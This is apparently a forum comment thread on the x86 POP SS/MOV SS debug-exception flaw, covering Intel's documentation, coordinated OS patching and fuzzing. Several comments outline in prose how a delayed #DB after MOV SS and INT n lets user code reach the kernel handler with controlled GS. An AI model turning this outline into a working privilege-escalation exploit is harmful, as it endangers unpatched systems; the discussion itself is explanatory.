> Somewhere around the release of the 8086, Intel decided to add a special caveat to instructions loading the SS register...where loading SS with [`pop ss` or `move ss`] would force the processor to disable external interrupts, NMIs, and pending debug exceptions.
So it's a really, really old piece of documentation, dating from around 1980.
To call it a 'misinterpretation' rather than a vulnerability is extremely generous, given that most Intel engineers spent entire careers in the presence of code vulnerable to this 'misinterpretation' without calling the OS vendors out on their error.
Agreed, but that's just saying that combining two or more simple things results in a more complex thing. All platforms I know of describe each individual instruction and its consequences, and leave you to deduce the consequences of combining them.
They were clear in 2006 when I was reading them. All the emulator implementors were very aware of it. Many old operating systems won't boot without the delay.
I'm trying to understand this one, even if most of my ASM knowledge is from the 8086 era. My guess:
* When an interrupt, debug exception, ... occurs, the CPU pushes stuff on the stack as part of the task switch.
* The stack is managed by 2 registers: SS and (e/r)SP. To change your stack, you have to change both registers. If an interrupt happens and you've changed only 1, stuff gets pushed on an invalid stack and you're toast.
* To fix this, the CPU has a wild card: When you change SS, you get exactly 1 instruction that will not be interrupted. The idea is you use that instruction to change (e/r)SP and make the stack valid again. If there is a need for an interrupt, it will be delayed for 1 instruction.
* Now this being a security problem, what would happen if you use this second instruction to switch to kernel mode ? It turns out the delayed interrupt happens before the first kernel mode instruction, but in the kernel.
* And you can trigger the right kind of interrupt with debug exceptions and single stepping.
* And if you do this, the kernel tells the debugger not about the debugged program but about the kernel. Oops.
So to fix this, I suppose the kernel checks the debug exception info from the CPU, and if it is debugging the kernel it fixes things up so you go back 1 instruction.
> To fix this, the CPU has a wild card: When you change SS, you get exactly 1 instruction that will not be interrupted. The idea is you use that instruction to change (e/r)SP and make the stack valid again. If there is a need for an interrupt, it will be delayed for 1 instruction.
I wonder, why could not they make a single instruction to change both SS and SP?
There are. I suppose LSS SP,value is possible on i386+ and there is also the task state segment which might help. But this was a hack in the original 8086, which wasnt the best processor design ever to start with. It stays there because of backward compatibility.
They could, but attackers would still use the approach that works for them.
And they can’t really remove the old instructions because of backwards compatibility.
Whitelisting a limited set of instructions that can follow setting SS and making all others trap might be an option, though. It still would break backwards compatibility, but if the effective impact would be negligible, they could deem it acceptable.
“Loading the SS register with a POP instruction suppresses or inhibits some debug exceptions and inhibits interrupts on the following instruction boundary. (The inhibition ends after delivery of an exception or the execution of the next instruction.) This behavior allows a stack pointer to be loaded into the ESP register with the next instruction (POP ESP) before an event can be delivered. See Section 6.8.3, “Masking Exceptions and Interrupts When Switching Stacks,” in Intel® 64 and IA-32 Architectures Software Developer’s Manual, Volume 3A. Intel recommends that software use the LSS instruction to load the SS register and ESP together.”
I bet whitelisting only instructions that can change SP/ESP would not break the majority of x86 code. All other instructions would behave as if MOV SS had not been executed.
will hold off on enabling the interrupts until right after the hlt has started so that you don't end up in a race condition when you get an interrupt between sti and hlt.
Albeit, they could have made an stiandhlt instruction here as well.
A trace exception shouldn't be creating work for a thread context that's ostensibly the one going to sleep with nothing to do, but an external interrupt very likely is.
In protected mode, SS is a descriptor offset into the GDT. It doesn’t make sense to change SS very often unless there are multiple stacks. Furthermore, it doesn’t make sense to overcomplicate an already over-complicated instruction set burdened with vestigal, legacy features. And, loading SS and SP atomtically would probably create a byte pattern that’s too long to encode.
You could, but it wouldn't allow them to relax the constraints here, since you'd have to recompile all the code in the world to use this new instruction before relaxing.
The cost would not have been very big. The 8086 had microcode, and there were the very similar LDS and LES instructions. There were plenty of unused slots in the opcode table so that wasnt it the reason either. There are weird instructions aplenty like XLAT or AAA/AAS/AAD/AAM, so it wasnt as if they had a pressing silicon shortage.
Maybe they dindt think about it, and fixed it with a quick hack once they got aware of the problem? The whole segment register story was very hacky from the start.
Intel might have dumped the segment registers in i386 32 bit protected mode, as they cleaned up a lot of other troublesome corners around that time. But, well, they didn't, so we have to deal with it today.
The fun thing is the 286 didn't fix this either. This is why the MOV SS came first (in protected mode the selector may not be present for example). This was a problem for DOS where SS was often used to access the DOS data segment.
Adding an interrupt delay is also not free and requires changes on hardware level. But if it was done in 80s then of course it was a safe hack because there was no kernel and user mode isolation at that time.
* There's an old feature which causes POP SS/MOV SS instructions to delay all interrupts until the next instruction has executed, to safely allow changing both SS and SP without an interrupt firing inbetween on a bad stack.
* If such an instruction itself causes an interrupt (by triggering a memory breakpoint through the debug registers), it is delayed (as intended).
* The delayed interrupt will fire after the second instruction even if the second instruction disabled interrupts.
* By means of the above, a MOV SS instruction triggering a #DB followed by an INT n instruction will cause the #DB exception to fire before the first instruction of the interrupt handler, even though this should be impossible (as entering the handlers sets IF=0, disabling interrupts).
* The OS #DB handler assumes GS has been fixed up by the previous interrupt handler, which in now under user control.
The x86 ISA and its implementations are now in the spotlight of the whole security research community. There is probably a lot more to come since it accumulated a lot of cruft in the name of backwards compatibility.
I hope we learn a lot, and take the time to record the experience, for coming platforms like RISC-V and others.
Why is there no big CAVEATs document from intel detailing weird quirks. I strongly assume the intel arch engineers are well aware of many of those counter-intuitive behaviours in their products.
> I strongly assume the intel arch engineers are well aware of many of those counter-intuitive behaviours in their products.
But it is likely just kind of distributed, organic knowledge that is hard to condense into a single document. Writing and maintaining such a thing would be a significant project, and (I am speculating here) not the kind of thing that significantly burnishes anyone's performance review.
That said, the whole community of assembly-hackers has even broader knowledge of the topic, and could start such a document out in the open. And Intel engineers might likely contribute their own two cents. (Unless lawyers forbid it).
Wow, the article shows that many vendors mis-read the docs: Apple, Microsoft, FreeBSD, Red Hat, Ubuntu, SUSE Linux, and other Linux distros...as well as VMware and Xen.
At that point can it really be attributed to "mis-reading" the docs? If every single independent implementor understood it the same way, the docs were wrong.
To be fair, Intel docs are so consistently gibberish that it might as well be classified a separate language (similar to english, but only a quarter the information density).
In this case it seems they just didn't properly specify a piece of insane behaviour though. Hell, I'd consider it an outright CPU bug if I'm reading this right. Seemingly there's a "feature" where loading SS causes interrupts to be delayed until after the next instruction, even if the next instruction disables interrupts - so you can cause an interrupt to fire on the first instruction of the handler (where it should be impossible).
1. The CPU does a buffer overflow when reading the array of bits used to determine IO permission for instructions like "in" and "out". Every OS which supports the feature has to add an extra byte of 0xff beyond the end of the array.
2. Returning from a 32-bit OS to a 16-bit process will only update the low 16 bits of the stack pointer. The upper 16 bits can still be read, leaking info about the kernel stack. Linux has a complicated work-around called espfix.
I have no doubt that the complexity adds to the difficulty of documenting it. But, I still think the documentation is failing when people across the industry who should be able to parse this complexity are unable to. Complexity just isn't an excuse for broadly misunderstood documentation in my opinion.
> Apple, Microsoft, FreeBSD, Red Hat, Ubuntu, SUSE Linux, and other Linux distros.
Just to clarify, this is kernel code. Listing 3 different (+ "other") Linux distros as affected is kinda bogus, it's not that they all made the same mistake, they just all use the same kernel.
As an example, Red Hat doesn’t ship major kernel upgrades except with major releases. If you’re running RHEL 6, you’re still on a 2.6 kernel and the fact that someone patched 4.x probably doesn’t help you all that much unless you have the time to backport the change and confirm that it doesn’t break something else.
Not just Germany, a very large chunk of Europe has a holiday today. Belgium, France, Netherlands, Portugal, the Nordics and Switzerland I'm sure about, there may be others.
I wonder what happens if you execute multiple POP SS instructions. In fact, you could set up a 64K v86 mode segment containing only copies of the POP SS instruction. jmp far into it. When IP reaches the last instruction it wraps around and starts again. Will it ever be interrupted by anything? If the stack usage bothers it, just do MOV SS,AX
”If a sequence of consecutive instructions each loads the SS register (using MOV or POP), only the first is guaranteed to inhibit or suppress events in this way.”
So, we still don’t know. For all I know, it may even depend on the exact cpu used or cpu state.
> Fixing the bug and having synchronized patches out by yesterday was an industry-wide effort, one that deserves praises, compared to the jumbled Meltdown and Spectre patching process.
Is this a fair comparison? I feel like the patching techniques must have been easier to develop than for Meltdown/Spectre. Furthermore, if this affected the same kind of people in this community, maybe this time around benefitted from the communication channels of the previous exercises.
Maybe this isn't a comparison to try and badmouth the previous iteration, and instead just tried to show a general improvement in the industry—I just find it a bit unfair.
This is one of the first times that I know of that the Linux kernel and Windows kernel developers discussed a security issue together directly. So while the fix was much simpler than Meltdown/Spectre was (Linux was fixed with a patch that was written in 2015) overall, the communication between different OS kernel developers right now is very good.
And yes, it is all due to the horrible Meltdown/Spectre problem and how that was handled. We were not allowed to work together for that problem, and we do not want to that to happen again.
There isn't one BSD kernel like there is one Linux kernel, there are several different ones which might borrow from each other, but are developed independently. A comparison can be found on Wikipedia: https://en.wikipedia.org/wiki/Comparison_of_operating_system...
And furthermore, the current stack address is determined by the combination of two registers: ss for the segment and rsp/esp/sp for the stack pointer within the segment. I guess the strange behavior around modifying ss comes from the fact that you need to also modify sp immediately afterwards, because otherwise you are running with a wild stack address pointing to random memory. You also can't modify sp before modifying ss because then you are also running with a wild stack, and an interrupt could come in at any time and push things onto random memory.
The vulnerability notes[1] say Apple patched this on May 8, but my last security update was May 3 and I don't currently show any available updates... I wonder if the May 3 patch fixed this, or if my computer might not be affected.
HardenedBSD would just receive it downstream from OpenBSD, wouldn't it? It's like contacting the Linux Mint group while contacting Ubuntu is sufficient.
HardenedBSD is a separate OS forked from FreeBSD with its own kernel development. While the BSDs may share some code, they're essentially all different OS'. There is no upstream like Linux has.
As a side-note after Spectre/Meltdown, Shawn Webb complained in a NYCBUG thread about getting not being able to get access to these embargoed vulnerabilities.
A bit tangentially related, but I've always wondered why the syscall instruction doesn't use the TSS for stack switching like int does. I guess it does give you more flexibility to load rsp from gs during a cpl 3 -> cpl 0 transition rather than consulting the TSS to switch it automatically. Can anyone weigh in on this?
Can someone explain the risk factor? It cannot be remotely exploited or though browser if I'm reading it right. But a malicious program with user level access can get kernel access. So exposure to malware running on a limited account can get higher access?
I'm sure the initial reaction here is going to be lamentation about the state of documentation. People will correctly point out that, if multiple entities misread the documentation, it just have been unclear. And they are right. But that doesn't make this Intel's fault alone. Clear or unclear, the documentation described behavior that was understood at the Intel organization, and the shipped product worked as described.
Where was the security testing at the OS level? Why can't there be automated test suites that catch unauthorized access issues before ship (if not before merge commit)? If your vendor delivers an insecure product and you don't discover it, how much blame do you share?
Concolic testing would probably catch it, but only if the person that implemented the hardware model for the theorem prover understood the Intel documentation, which seems unlikely.
Basic fuzzing probably wouldn’t catch this; as the other comments point out, the search space is probably too large, and the set of vulnerable executions is probably too small for an undirected random search.
I’d be truly amazed if a fuzzer could have caught this one. You need to invoke debug syscalls with the right parameters and the do a magic two-to-three instruction sequence.
If you can't trust the CPU documentation how can you test that addition works? even if you could test all possible combinations of terms to add and verify the results there may be a hidden flag somewhere that when flipped will change how addition works.
On that subject, I'm curious whether there is any CPU out there that sets the overflow flag incorrectly when computing (-1) - n when n is the most negative number (which negates to itself, so implementing subtraction by simply negating the RHS and adding will screw up the flags).
The ARM ARM documents sub(left, right, no carry) as add(left, ~right, carry set), which is also the most straightforward implementation if you have to account for carry anyway.
Your idea is akin to searching the space of unknown unknowns, By definition someone can not even begin to quantify the space of what you don't know you don't know.
https://everdox.net/popss.pdf
the researcher wrote:
> Somewhere around the release of the 8086, Intel decided to add a special caveat to instructions loading the SS register...where loading SS with [`pop ss` or `move ss`] would force the processor to disable external interrupts, NMIs, and pending debug exceptions.
So it's a really, really old piece of documentation, dating from around 1980.
To call it a 'misinterpretation' rather than a vulnerability is extremely generous, given that most Intel engineers spent entire careers in the presence of code vulnerable to this 'misinterpretation' without calling the OS vendors out on their error.